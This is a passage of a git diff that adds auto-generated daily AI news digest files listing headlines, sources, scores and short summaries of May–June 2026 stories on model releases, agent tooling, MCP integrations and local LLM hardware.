aren't exactly consumer hardware (we know), so the easiest path is to rent one from a cloud GPU provider. Once you've got access, spin up the server and start editing videos in your browser. There's also a mock backend in the repo if you want to hack on the UI without touching a GPU. The release covers the browser workspace, Python runtime for sessions and worker management, fMP4 streaming over websocket, prompt rewriting with safety filters, plus Docker images. The idea is that it can also serve as a sample architecture for anyone building their own real-time video gen apps. One more thing before you go. On the RTX 5090 side, we've gotten Wan2.1 1.3B running in under 2s on a single 5090, and we're working on integrating it into Dreamverse so y'all don't need a B200 to play with this. More on that soon :) Repo: [https://github.com/hao-ai-lab/FastVideo/tree/main/apps/dreamverse](https://github.com/hao-ai-l… + +--- + +## [Qwen3.6 huge quality gain from Q4 to Q6 for coding agent](https://reddit.com/r/LocalLLaMA/comments/1tpebhw/qwen36_huge_quality_gain_from_q4_to_q6_for_coding/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: agent_tool + +> So, last week I tried to update my unused local LLM setup. I had to stop using it because quality was too low and deepseek was too cheap. First thing I stopped using Ollama and now I only use llama.cpp built in server that works really great. The quality improvement from Q4 to Q6 is outstanding and finally a local LLM server can work very similarly to paid APIs. That's great! And MTP makes a big performance gain, on a dual 3090 (downvolted and limited to 65°C) it generates from 20 to 50 tokens per second with minimal heat generation. So yes, that time has finally arrived! Local coding agents are a thing and they work 😎 + +--- + diff --git a/data/digest-2026-05-28.md b/data/digest-2026-05-28.md new file mode 100644 index 0000000..83ddda6 --- /dev/null +++ b/data/digest-2026-05-28.md @@ -0,0 +1,121 @@ +# Stack Scout - AI News Digest +**2026-05-28** | 15 stories | Auto-generated from 714 archived stories + +--- + +## [Claude Code 2.1.153 Open Changelog Reflects Anthropic's Transparent Developer Tooling Strategy](https://x.com/ClaudeCodeLog/status/2059802880811434228) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: cli_tool, tool_update, agent_tool + +> Anthropic's commitment to publishing detailed Claude Code changelogs with every release enables developers to track improvements and plan migrations. Version 2.1.153 with 36 CLI changes reflects rapid iteration in the agentic coding space. + +--- + +## [I built and open-sourced Skill Index to organize & standardize your AI agent knowledge across Claude, Codex, Cursor, and more. 100% local and free on macOS.](https://reddit.com/r/ClaudeAI/comments/1tprx27/i_built_and_opensourced_skill_index_to_organize/) +*Reddit r/ClaudeAI* | 28/05/2026 | Score: 1.00 +Tags: mcp, open_source, agent_tool + +> I’ve been using Claude alongside other coding agents, and I kept running into the same problem: useful skills, MCPs, commands, hooks, and workflows start getting scattered across different tools. Sometimes Claude has the best version of something. Sometimes Codex or Cursor does. Sometimes an MCP is configured in one agent but missing or slightly different in another. Over time, it gets harder to treat your agent knowledge as one reusable system. So I built Skill Index: a free, open-source, 100% local macOS app for organizing and standardizing AI agent knowledge. The goal is to make it easier to bring reusable skills/MCPs/agent knowledge into Claude, while also keeping Claude’s own knowledge portable across the rest of your setup. It can help you: \- see where your skills and MCPs live \- compare what Claude, Codex, Cursor, Windsurf, and other agents can access \- standardize around a canonical definition of each skill/MCP \- keep your skills and MCPs in sync across every agent It’s local-first: no accounts, no cloud sync, no telemetry. Website: [https://skillindex.app](https://skillindex.app) GitHub: [https://github.com/arjitj2/skillindex](https://github.com/arjitj2/skillindex) + +--- + +## [MCP Servers / Connectors in Claude Desktop / Cowork via AWS Bedrock](https://reddit.com/r/ClaudeAI/comments/1tpxskx/mcp_servers_connectors_in_claude_desktop_cowork/) +*Reddit r/ClaudeAI* | 28/05/2026 | Score: 0.78 +Tags: mcp, developer_tool, cli_tool + +> While using MCP servers in the code CLI works with MCP servers, I'm having trouble using connectors or MCP servers in Cowork. Connecting to Jira or O365 seems not possible. With Bedrock, we don't have the Chat, but only the Cowork tab and also some additional settings are missing. I tried configuring the claude\_desktop\_config.json with MCP servers, but cowork doesn't seem to be able to use it. I can Import a manual plugin, but after a restart it seems gone and configuring it in cowork is not possible, the authentication doesn't work. Did anyone manage to get Connectors / MCP Servers / Plugins in Claude Desktop with Bedrock to work, and if so, how? + +--- + +## [Introducing Claude Opus 4.8](https://reddit.com/r/ClaudeAI/comments/1tq99mu/introducing_claude_opus_48/) +*Reddit r/ClaudeAI* | 28/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> We’re upgrading Claude Opus to a new version: Claude Opus 4.8. It builds on Opus 4.7 with sharper judgment, more honesty about its own progress, and the ability to work independently for longer than its predecessors. Available today for the same price. In Claude Code, you can hand off a feature, a migration, or a bug sweep and let it follow the work through while you focus on what’s next. Also launching today: * Fast mode for Opus 4.8 (research preview). Same model at roughly 2.5x the speed, now three times cheaper than before. * Dynamic workflows in Claude Code (research preview). Claude runs hundreds of parallel subagents in a single session and verifies its work before reporting back. * A new effort control on [claude.ai](http://claude.ai), so you can choose how much thinking Claude puts into a response. Claude Opus 4.8 is live today on [claude.ai](http://claude.ai), the Claude Platform, and all major cloud platforms. Read more: [anthropic.com/news/claude-opus-4-8](http://anthropic.com/news/claude-opus-4-8) + +--- + +## [I built an enforcement layer for AI coding agents using a local knowledge graph and hybrid RAG](https://reddit.com/r/LocalLLaMA/comments/1tq6sd0/i_built_an_enforcement_layer_for_ai_coding_agents/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> I know this sub is focused on local models but the architecture behind this applies to any LLM-powered coding agent, not just Claude Code. The problem: when you give a coding agent a large set of rules and standards, two things break. The context fills up with rules that aren't relevant to the current task, and nothing enforces compliance. The agent reads your instructions and decides what to follow. I built Writ to solve both. The knowledge layer: rules, skills, techniques, antipatterns, and playbooks live as nodes in a Neo4j knowledge graph with typed relationships between them. A five stage retrieval pipeline (BM25 over Tantivy, vector similarity over HNSW with a local ONNX embedding model, graph traversal, reciprocal rank fusion, context budget management) retrieves only what's relevant per task. Everything runs locally. No API calls for retrieval. The embedding model (all-MiniLM-L6-v2) runs through ONNX runtime, not PyTorch, so inference is fast without a GPU. The enforcement layer: 30 bash hook scripts intercept tool calls before execution. The agent can't write code without an approved plan, can't skip tests, can't say "tests pass" without running static analysis. These are… + +--- + +## [Kept context-switching between arxiv, OpenReview, GitHub, and HuggingFace for every paper, so I built this. Chrome extension + website with everything inline, plus citation graph + SPECTER2 neighbors. 3M papers, free, feedback welcome [P]](https://reddit.com/r/MachineLearning/comments/1tq53il/kept_contextswitching_between_arxiv_openreview/) +*Reddit r/MachineLearning* | 28/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com/) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use? + +--- + +## [Built a richer reading layer for arxiv (Chrome extension + web): OpenReview reviews, GitHub/HuggingFace links, citation graph, SPECTER2 neighbors, TLDRs. 3M papers, free, looking for feedback [P]](https://reddit.com/r/MachineLearning/comments/1tq31yu/built_a_richer_reading_layer_for_arxiv_chrome/) +*Reddit r/MachineLearning* | 28/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use? + +--- + +## [SDXL image generation now works on iPhone. The bug that blocked it for months was a missing file check](https://reddit.com/r/StableDiffusion/comments/1tq302b/sdxl_image_generation_now_works_on_iphone_the_bug/) +*Reddit r/StableDiffusion* | 28/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> We've been building \[Off Grid\](https://github.com/alichherawalla/off-grid-mobile-ai) - open-source app for on-device AI (text + image gen, no cloud). SDXL on iPhone was broken for months. Users kept reporting it, we couldn't reproduce it consistently. Turns out: SDXL models ship in two UNet layouts: \- Monolithic: one big \`Unet.mlmodelc\` file \- Chunked: \`UnetChunk1.mlmodelc\` + \`UnetChunk2.mlmodelc\` Our validation code only checked for the monolithic layout. If you downloaded a chunked SDXL model (which most are), the app said "model invalid" and refused to load it. Months of reports. The fix was adding the chunked layout check — straightforward once we understood the problem. The app uses Apple's ml-stable-diffusion framework with CoreML. On an iPhone 15 Pro, you get SDXL images in about 30-45 seconds fully on-device. No internet needed at any point - the model lives on your phone. It's free and open source: \- GitHub: [https://github.com/alichherawalla/off-grid-mobile-ai](https://github.com/alichherawalla/off-grid-mobile-ai) \- iOS: [https://apps.apple.com/us/app/off-grid-local-ai/id6759299882](https://apps.apple.com/us/app/off-grid-local-ai/id6759299882) \- Android (SD… + +--- + +## [DSPy v3.3.0 Beta Brings ReActV2 to Open-Source AI Programming Framework](https://x.com/isaacbmiller1/status/2059828079371894786) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Stanford's DSPy framework released v3.3.0 beta on PyPI with ReActV2, improved LM/BaseLM architecture, and RLM data-passing support. DSPy is widely used for structured programming with language models in both research and production. + +--- + +## [Tencent WorkBuddy Global Launch Brings China's Top Desktop AI Agent to International Markets](https://x.com/TencentAI_News/status/2059827192964808922) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> Tencent's WorkBuddy desktop AI agent — already China's market leader — launches worldwide with autonomous handling of coding, analysis, and productivity tasks. The global launch challenges Microsoft Copilot, Cursor, and other Western enterprise AI assistants on their home turf. + +--- + +## [Local run for multi users: which software set?](https://reddit.com/r/LocalLLaMA/comments/1tq0cj7/local_run_for_multi_users_which_software_set/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> Context: I am testing and running local LLM on Linux for some months, first with llama.cpp and now with vLLM for better concurrent capabilities. I use llama-swap in front of either vLLM or llama.cpp in order to have thinking and non-thinking variants exposed with all inference parameters adjusted according to the model requirements. My needs: now, I would like to make the LLM available to multiple (less than 10) users, outside from the local network: https access, web chat interface with either connection or api-key, API access with api-key. What I tried: * apache as frontend proxy: handle SSL part and redirect to internal applications as unsecured connections. * LibreChat as web user interface * llama-swap * vLLM Observed problems: * concurrency is limited to 10 requests (llama-swap limitation, either find how to raise this value or good alternative) * LibreChat only gives web interface, still need API access with keys management. Which open source software set do you use to serve multiple users? Do you know simple keys management tools? Did I miss something? Thank for any help! + +--- + +## [OpenAI releases secure tunnels to connect private Model Context Protocol servers without modifying inbound firewallsOutbound-only HTTPS tunnels secure the connection to OpenAI.](https://www.digg.com/ai/28n5w7d2) +*Digg AI* | Score: 1.00 +Tags: mcp, product_launch + +--- + +## [Genesis AI launches Genesis World 1.0, an open-source robotics simulator that turns one hour of real-world testing into 100 simulation daysIt features GPU-accelerated physics solvers and path-traced rendering](https://www.digg.com/ai/tuo1sird) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Vulnerability found in framework used by VLLM, many MCP servers, and other LLM tools](https://reddit.com/r/LocalLLaMA/comments/1tpp2th/vulnerability_found_in_framework_used_by_vllm/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> Worth taking a look to see if this affects any of you. Surprised nobody has posted it yet. + +--- + +## [GH200 NVL2 or 8x RTX 6000 Blackwell for running Kimi K2.6 / DeepSeek V4 locally? (5 devs, agentic coding)](https://reddit.com/r/LocalLLaMA/comments/1tpp0a7/gh200_nvl2_or_8x_rtx_6000_blackwell_for_running/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Trying to figure out the right box for my team and wanted to see if anyone had any clue which would be a better fit or if it is not worth our time in our budget. Situation: 5 of us doing agentic coding (lots of long context getting re-sent every turn, parallel tool calls, etc.) and we want to self-host the latest open MoE models — Kimi K2.6 and DeepSeek V4 class. My boss likes the idea of having it in house so no point in just saying pay the API (I did pitch that) Budget is around $100k - $150k. I'm stuck between a dual GH200 NVL2 (cheaper, \~1.2TB unified memory) (about 95k) and an 8x RTX 6000 Pro Blackwell build (768GB of actual fast VRAM, more expensive) (about 140k). To get real numbers I rented a single GH200 and tested Kimi K2.6 at a 2-bit quant. After some playing around I got it up to \~23 tok/s decode, which is not bad considering it is one GH200 with only 96gb of HBM, but I am not sure how it will scale to the dual GH200. The prefill was pretty slow yet again not sure how it will scale. The thing I keep coming back to: these models are too big to fit in HBM no matter what. Even the NVL2's 288GB HBM3e can't hold them, so the model partially lives in the slower unified mem… + +--- + diff --git a/data/digest-2026-05-29.md b/data/digest-2026-05-29.md new file mode 100644 index 0000000..bbd25dd --- /dev/null +++ b/data/digest-2026-05-29.md @@ -0,0 +1,111 @@ +# Stack Scout - AI News Digest +**2026-05-29** | 15 stories | Auto-generated from 468 archived stories + +--- + +## [Runway Exposes Gen-4.5, Kling, and GPT Image 2 via MCP — Creative Models Now Callable Inside Claude, Cursor, and Replit Agents](https://x.com/runtimewire/status/2059782827927810437) +*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 +Tags: mcp, tool_update, agent_tool + +> Runway plugged its creative model suite into Claude, ChatGPT, Cursor, and Replit via MCP, making image and video generation callable directly inside AI agent workflows. Runway Gen-4.5, Kling, and GPT Image 2 are all exposed through the integration. + +--- + +## [Kling AI Skill Launches for Agent Workflows — Text-to-Video, 4K Images, and Cross-Scene Consistency in Claude and Cursor](https://x.com/MayorKingAI/status/2044455291664695688) +*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 +Tags: product_launch, tool_update, agent_tool + +> Kling AI launched a dedicated Skill for AI agent workflows, enabling text/image to video generation, 4K image generation, style transfer, and cross-scene consistency with custom elements. Works natively with Claude, Cursor, Copilot, Codex, and OpenClaw. + +--- + +## [Motion Launches Motion API — Connect the AI Motion Design Tool Directly Into Claude, Codex, OpenClaw, and Hermes](https://x.com/_adishj/status/2060028771399500237) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: api_update, product_launch, tool_update + +> Motion released the Motion API, enabling one-click integration of the AI motion design tool directly into Claude, Codex, OpenClaw, Hermes, and other AI frameworks. Agents can now generate motion design content as part of automated creative workflows. + +--- + +## [X Square Robot Releases Open-Source WALL-WM World Model For Embodied AI](https://www.digg.com/ai/v4d0ka2f) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Anthropic Releases Opus 4.8 With Strong Agentic Coding Benchmarks](https://www.digg.com/ai/6gzrebez) +*Digg AI* | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [ElevenLabs Launches Dubbing V2 — SOTA Audio-to-Audio Dubbing That Preserves Emotion in 90+ Languages](https://x.com/Carles_Reina/status/2060035887946248616) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> ElevenLabs introduced Dubbing V2, described as the world's state-of-the-art model for high-quality dubbing. The Audio-to-Audio model preserves the original speaker's emotion and intent across 90+ languages. Available now through ElevenCreative, with API access coming soon. + +--- + +## [Hexo Releases SIA — Open-Source Self-Improving AI That Updates Its Own Weights During Goal Pursuit](https://x.com/kunalbhatia91/status/2060013228231725092) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: product_launch, open_source + +> Hexo released SIA, an open-source Self-Improving AI that achieves goals through recursive self-improvement — updating its own capabilities as it works toward a goal, not just calling tools with fixed capabilities. The announcement earned 221 likes and 80,000 views. + +--- + +## [Shift Launches in NYC — AI Economy Startup Offers Free Home Cleaning to Bridge Today's Economy to the AI Abundance Era](https://x.com/bercankilic/status/2060043312606638245) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Shift launched in New York City with a mission to bridge the current economy into the AI economy where goods, services, and leisure become affordable through AI. The launch includes free home cleaning as the entry product. + +--- + +## [minWM: A Full-Stack Open-Source Framework for Real-Time Interactive Video World Models](https://paperswithcode.com/papers/2605.30263) +*Papers With Code* | Score: 0.90 +Tags: open_source, developer_tool + +--- + +## [DeepSeek's Deli Chen releases an LLM continual learning survey paper generated autonomously by the DeliAutoResearch systemIt maps out self-improvement methods like STaR and o1.](https://www.digg.com/ai/xay55qwq) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [ElevenLabs Releases Dubbing V2 With Emotion-Preserving Multilingual Audio](https://www.digg.com/ai/hsa7ykbd) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [OpenAI launches Rosalind Biodefense, giving U.S. government agencies access to its specialized GPT-Rosalind modelThe initiative focuses on defending against engineered pathogens.](https://www.digg.com/ai/dl0e6ofa) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Anthropic releases Claude Opus 4.8 with improved coding and agentic performance at the same price as Opus 4.7](https://www.digg.com/ai/a6c6c36e-38c7-4420-9908-d435740c4ac8) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [100% AI Product Videos Made in Under 5 Minutes Achieve Commercial Quality — Realism Framework Hits New Threshold](https://x.com/Mho_23/status/2048507307466658062) +*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 +Tags: developer_tool + +> AI-generated product videos made in under 5 minutes are reaching commercial marketing quality, with a realism framework demonstrating results compelling enough for real product ads. The UGC video format has become the clearest commercial use case for AI video generation. + +--- + +## [Garry Tan Endorses Hermes Agent Stack — YC President's 600-Like Post Signals Mainstream Adoption](https://x.com/garrytan/status/2052434681363321056) +*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 +Tags: open_source + +> Y Combinator President Garry Tan publicly endorsed his OpenClaw/Hermes Agent setup as significantly improved, with the post generating 600+ likes. The endorsement signals that open-source agent coordination has crossed from early adopter into mainstream developer infrastructure. + +--- + diff --git a/data/digest-2026-05-30.md b/data/digest-2026-05-30.md new file mode 100644 index 0000000..41a7fd5 --- /dev/null +++ b/data/digest-2026-05-30.md @@ -0,0 +1,103 @@ +# Stack Scout - AI News Digest +**2026-05-30** | 15 stories | Auto-generated from 214 archived stories + +--- + +## [Show HN: VT Code – open-source terminal coding agent in Rust](https://github.com/vinhnx/VTCode) +*Hacker News* | 30/05/2026 | Score: 0.82 +Tags: open_source, cli_tool, agent_tool + +--- + +## [OpenAI releases Codex v26.527, enabling Windows computer use and remote desktop control from mobile devicesA new profile interface tracks token activity and usage statistics.](https://www.digg.com/ai/2cvxmdwh) +*Digg AI* | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [Oura Ring 5 Launches — 40% Smaller Than Ring 4, Blood Pressure Monitoring, Ships June 4 at $399](https://ouraring.com/blog/oura-ring-5) +*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Oura launched Ring 5, the world's smallest smart ring at 40% smaller than Ring 4, starting at 2 grams. New features include blood pressure change monitoring, sleep apnea detection, and an AI health coach. Ships June 4, $399. + +--- + +## [Cursor Releases Developer Habits Report on AI Coding Trends](https://www.digg.com/ai/6jh7d90b) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Brilliant Launches Koji AI Tutor to Build Kids' Critical Thinking](https://www.digg.com/ai/9jzt6gwc) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Shift Launches Free NYC Cleaning to Gather Robotics Training Data](https://www.digg.com/ai/5ol0wuf6) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Mythos-Class AI Models Coming to All Customers in Weeks — Anthropic Confirms Safeguards Ready After Restricted Testing](https://www.bloomberg.com/news/articles/2026-05-28/anthropic-plans-wide-release-of-mythos-level-ai-models-in-weeks) +*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 +Tags: product_launch + +> Anthropic confirmed through Bloomberg and Axios that Mythos-class models — previously limited to select testers under Project Glasswing due to cyber capabilities — will reach general availability in coming weeks after completing safety validation. + +--- + +## [Mystery Company Burns $500M on Claude in One Month — Token Budget Collapse Exposes Enterprise AI Cost Controls Gap](https://www.tomshardware.com/tech-industry/ai/mystery-company-accidentally-blew-500-million-on-claude-ai-in-a-single-month) +*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 +Tags: api_update + +> An unidentified company accidentally spent $500 million on Claude API in a single month after failing to set usage limits on employee licenses, per Tom's Hardware and WSJ. Amazon's concurrent token leaderboard shutdown after employees gamed it reveals tokenmaxxing as a systemic enterprise risk. + +--- + +## [Bun Rewrote Itself in Rust in 6 Days Using Claude Dynamic Workflows — Jarred Sumner Confirms 'Anthropic Launch Stunt'](https://x.com/jarredsumner/status/2060XXX) +*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 +Tags: agent_tool + +> Jarred Sumner confirmed that Bun's headline-grabbing Rust rewrite in 6 days was made possible by Claude Code's Dynamic Workflows — and a Bluesky user noted it was 'an Anthropic launch stunt.' The incident illustrates both the genuine capability of agentic coding and the coordinated nature of AI marketing. + +--- + +## [wolfSSL releases a new product; wolfCOSE a zero alloc C embbedded COSE stack](https://github.com/wolfSSL/wolfCOSE) +*Hacker News* | 30/05/2026 | Score: 0.94 +Tags: product_launch + +--- + +## [OpenAI Extends Codex Computer Use To Windows](https://www.digg.com/ai/24n5kcme) +*Digg AI* | Score: 0.94 +Tags: agent_tool + +--- + +## [Brilliant founder Sue Khim launches Koji, an interactive AI tutor that coaches children through math and coding without giving direct answersIt personalizes lessons using a decade of student learning data](https://www.digg.com/ai/hqutws0i) +*Digg AI* | Score: 0.94 +Tags: product_launch + +--- + +## [Kore: Binary File Format Optimized for Modern Data Systems (Open Source)](https://github.com/arunkatherashala/Kore) +*Hacker News* | 30/05/2026 | Score: 0.89 +Tags: open_source + +--- + +## [ChatGPT — Release Notes](https://help.openai.com/en/articles/6825453-chatgpt-release-notes#:~:text=May%2028%2C%202026,models%20are%20sunset.) +*The Verge AI* | Score: 0.76 +Tags: tool_update + +--- + +## [Show HN: Open Envelope – an open schema for defining AI agent teams](https://openenvelope.org/docs/schema/) +*Hacker News* | 28/05/2026 | Score: 0.75 +Tags: agent_tool + +--- + diff --git a/data/digest-2026-05-31.md b/data/digest-2026-05-31.md new file mode 100644 index 0000000..a10904c --- /dev/null +++ b/data/digest-2026-05-31.md @@ -0,0 +1,11 @@ +# Stack Scout - AI News Digest +**2026-05-31** | 1 stories | Auto-generated from 98 archived stories + +--- + +## [Show HN: Breathe CLI – Paced resonance breathing in the macOS terminal](https://github.com/marekkowalczyk/breathe-cli) +*Hacker News* | 30/05/2026 | Score: 0.77 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-06-01.md b/data/digest-2026-06-01.md new file mode 100644 index 0000000..11d154f --- /dev/null +++ b/data/digest-2026-06-01.md @@ -0,0 +1,35 @@ +# Stack Scout - AI News Digest +**2026-06-01** | 5 stories | Auto-generated from 220 archived stories + +--- + +## [Nvidia announces new AI chip for personal computers](https://www.bbc.com/news/articles/crmp9mppvzro) +*Hacker News* | 01/06/2026 | Score: 1.00 +Tags: product_launch + +--- + +## [AI Agent Guidelines for CS336 at Stanford](https://github.com/stanford-cs336/assignment1-basics/blob/main/CLAUDE.md) +*Hacker News* | 01/06/2026 | Score: 0.91 +Tags: agent_tool + +--- + +## [OpenAI frontier models and Codex are now available on AWS](https://openai.com/index/openai-frontier-models-and-codex-are-now-available-on-aws/) +*Hacker News* | 01/06/2026 | Score: 0.83 +Tags: product_launch + +--- + +## [Malicious npm packages detected across Red Hat Cloud Services](https://github.com/RedHatInsights/javascript-clients/issues/492) +*Hacker News* | 01/06/2026 | Score: 0.83 +Tags: cli_tool + +--- + +## [Movwin: My (Unpublished) TUI Framework](https://movq.de/blog/postings/2026-05-29/0/POSTING-en.html) +*Hacker News* | 30/05/2026 | Score: 0.77 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-06-02.md b/data/digest-2026-06-02.md new file mode 100644 index 0000000..9756289 --- /dev/null +++ b/data/digest-2026-06-02.md @@ -0,0 +1,29 @@ +# Stack Scout - AI News Digest +**2026-06-02** | 4 stories | Auto-generated from 241 archived stories + +--- + +## [Microsoft announces Scout, an autonomous AI agent built on OpenClaw](https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html) +*Hacker News* | 02/06/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [Alphabet announces $80B equity capital raise to expand AI infra and compute](https://abc.xyz/investor/news/news-details/2026/Alphabet-Announces-Proposed-80-Billion-Equity-Capital-Raise-to-Expand-AI-Infrastructure-and-Compute-2026-b0myAMewCa/default.aspx) +*Hacker News* | 01/06/2026 | Score: 1.00 +Tags: product_launch + +--- + +## [HP re-releases classic computer science calculator: The HP-16C](https://hpcalcs.com/product/hp-16c-collectors-edition/) +*Hacker News* | 02/06/2026 | Score: 0.94 +Tags: product_launch + +--- + +## [Apple rejected my dictation app for using the accessibility API](https://www.mitmllc.com/blog/apple-rejected-my-dictation-app/) +*Hacker News* | 02/06/2026 | Score: 0.86 +Tags: api_update + +--- + diff --git a/data/digest-2026-06-03.md b/data/digest-2026-06-03.md new file mode 100644 index 0000000..5dbd671 --- /dev/null +++ b/data/digest-2026-06-03.md @@ -0,0 +1,41 @@ +# Stack Scout - AI News Digest +**2026-06-03** | 6 stories | Auto-generated from 269 archived stories + +--- + +## [Ableton Extensions SDK](https://www.ableton.com/en/live/extensions/) +*Hacker News* | 03/06/2026 | Score: 0.82 +Tags: api_update, developer_tool + +--- + +## [Gooey: A GPU-accelerated UI framework for Zig](https://github.com/duanebester/gooey) +*Hacker News* | 03/06/2026 | Score: 0.94 +Tags: developer_tool + +--- + +## [Capstone – multi-platform, multi-architecture disassembly framework](https://www.capstone-engine.org/) +*Hacker News* | 03/06/2026 | Score: 0.94 +Tags: developer_tool + +--- + +## [Skyvern (YC S23) Is Hiring Open-Source Loving DevRel Engineers](https://www.ycombinator.com/companies/skyvern/jobs/1qRTlVx-founding-developer-marketing-open-source-ai) +*Hacker News* | 03/06/2026 | Score: 0.89 +Tags: open_source + +--- + +## [Roku LT Operating System open source distribution](https://blog.roku.com/developer/roku-lt-os) +*Hacker News* | 03/06/2026 | Score: 0.86 +Tags: open_source + +--- + +## [Journey to JPEG XL: open-source experiments shaped the future of image coding](https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html) +*Hacker News* | 03/06/2026 | Score: 0.66 +Tags: open_source + +--- + diff --git a/data/digest-2026-06-04.md b/data/digest-2026-06-04.md new file mode 100644 index 0000000..0ee2879 --- /dev/null +++ b/data/digest-2026-06-04.md @@ -0,0 +1,35 @@ +# Stack Scout - AI News Digest +**2026-06-04** | 5 stories | Auto-generated from 224 recent stories + +--- + +## [Anthropic's open-source framework for AI-powered vulnerability discovery](https://github.com/anthropics/defending-code-reference-harness) +*Hacker News* | 04/06/2026 | Score: 0.56 +Tags: open_source, developer_tool + +--- + +## [Ableton Extensions SDK](https://www.ableton.com/en/live/extensions/) +*Hacker News* | 03/06/2026 | Score: 0.56 +Tags: api_update, developer_tool + +--- + +## [Show HN: Open Terminal – A Bloomberg Style App for Research](https://tesseractanalytics.ai/) +*Hacker News* | 04/06/2026 | Score: 0.56 +Tags: cli_tool + +--- + +## [Meta's ships facial recognition on smart glasses](https://www.buchodi.com/meta-glasses-facial-recognition/) +*Hacker News* | 04/06/2026 | Score: 0.48 +Tags: tool_update + +--- + +## [Journey to JPEG XL: open-source experiments shaped the future of image coding](https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html) +*Hacker News* | 03/06/2026 | Score: 0.48 +Tags: open_source + +--- + diff --git a/data/digest-2026-06-05.md b/data/digest-2026-06-05.md new file mode 100644 index 0000000..7509375 --- /dev/null +++ b/data/digest-2026-06-05.md @@ -0,0 +1,35 @@ +# Stack Scout - AI News Digest +**2026-06-05** | 5 stories | Auto-generated from 186 recent stories + +--- + +## [Anthropic's open-source framework for AI-powered vulnerability discovery](https://github.com/anthropics/defending-code-reference-harness) +*Hacker News* | 04/06/2026 | Score: 0.56 +Tags: open_source, developer_tool + +--- + +## [Open Code Review – An AI-powered code review CLI tool](https://github.com/alibaba/open-code-review) +*Hacker News* | 05/06/2026 | Score: 0.48 +Tags: cli_tool + +--- + +## [Meta's ships facial recognition on smart glasses](https://www.buchodi.com/meta-glasses-facial-recognition/) +*Hacker News* | 04/06/2026 | Score: 0.48 +Tags: tool_update + +--- + +## [databow: a Rust CLI to query any database with an ADBC driver](https://columnar.tech/blog/introducing-databow//) +*Hacker News* | 03/06/2026 | Score: 0.48 +Tags: cli_tool + +--- + +## [Branchless Quicksort 